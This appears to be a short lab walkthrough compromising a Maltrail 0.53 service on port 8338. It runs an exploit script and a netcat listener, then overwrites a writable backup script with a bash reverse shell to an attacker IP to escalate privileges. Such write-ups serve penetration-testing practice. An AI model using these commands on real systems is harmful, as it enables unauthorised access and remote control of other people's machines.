8338

Using this exploit for Maltrack 0.53 but it might work on 0.52:

python3 exploit.py 192.168.45.229 8338 http://192.168.182.32:8338

Setting up a listener:

sudo rlwrap -nlvp 8338

Running pspy64: Checking permissions for etc_Backup.sh: We can write to it.

echo '#!/bin/bash' > etc_Backup.sh
echo 'bash -i >& /dev/tcp/192.168.45.229/80 0>&1' >> etc_Backup.sh

Now we get a shell: We used penelope to catch the shell in this image.

Last updated

Was this helpful?